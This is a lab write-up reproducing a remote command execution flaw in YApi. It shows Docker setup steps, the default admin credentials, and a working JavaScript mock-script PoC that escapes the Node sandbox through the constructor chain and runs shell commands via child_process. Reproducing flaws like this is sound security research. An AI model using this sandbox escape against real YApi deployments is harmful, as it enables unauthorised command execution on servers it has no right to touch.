Reproducing the Yapi Remote Command Execution Vulnerability
Environment setup
docker pull registry.cn-hangzhou.aliyuncs.com/anoy/yapi
mkdir -p /home/data/yapi/mongodata
docker run --restart always -v /home/data/yapi/mongodata:/data/db -d --name yapimongo mongo
docker run -it --rm --link yapimongo:mongo --entrypoint npm --workdir /api/vendors registry.cn-hangzhou.aliyuncs.com/anoy/yapi run install-server
docker run -d --restart=always --name yapi --link yapimongo:mongo --workdir /api/vendors -p 3001:3000 registry.cn-hangzhou.aliyuncs.com/anoy/yapi server/app.js
Once the container is up, open IP:3001 in a browser. The install-server step prints the initial admin credentials:
初始化管理员账号成功,账号名:"admin@admin.com",密码:"ymfe.org"
Vulnerability reproduction
Log in and create a new project.
Then open the project settings, choose the global mock script, and enter the command-execution PoC as the script:
const sandbox = this                                      // `this` is the sandbox global, a host-created object
const ObjectConstructor = this.constructor                // its prototype chain leads to the host Object
const FunctionConstructor = ObjectConstructor.constructor // Object.constructor is the host Function
const myfun = FunctionConstructor('return process')       // a Function built in the host realm sees the host `process`
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString() // command output becomes the mock response
Save the script and request the project's mock URL: the response body contains the output of the executed commands.